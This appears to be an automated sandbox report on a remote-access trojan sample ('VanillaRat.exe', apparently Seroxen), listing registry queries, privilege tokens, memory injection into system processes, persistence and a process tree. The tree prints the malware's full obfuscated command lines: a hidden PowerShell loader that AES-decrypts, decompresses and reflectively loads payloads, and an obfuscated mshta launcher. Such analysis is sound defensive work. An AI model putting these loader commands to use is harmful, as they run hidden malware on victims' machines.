Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1656 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3112 wrote to memory of 3980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3980 wrote to memory of 4644 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 3980 wrote to memory of 4644 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 4644 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1048 wrote to memory of 2944 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1048 wrote to memory of 2944 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 2944 wrote to memory of 3140 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 2944 wrote to memory of 3140 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 3140 wrote to memory of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 1404 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3140 wrote to memory of 1404 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 wrote to memory of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4716 wrote to memory of 640 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe

"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d490fd13-03bc-43de-899e-2e1d4c594870}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{5bceada9-83a7-4a7b-b04b-6941595c7e5c}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

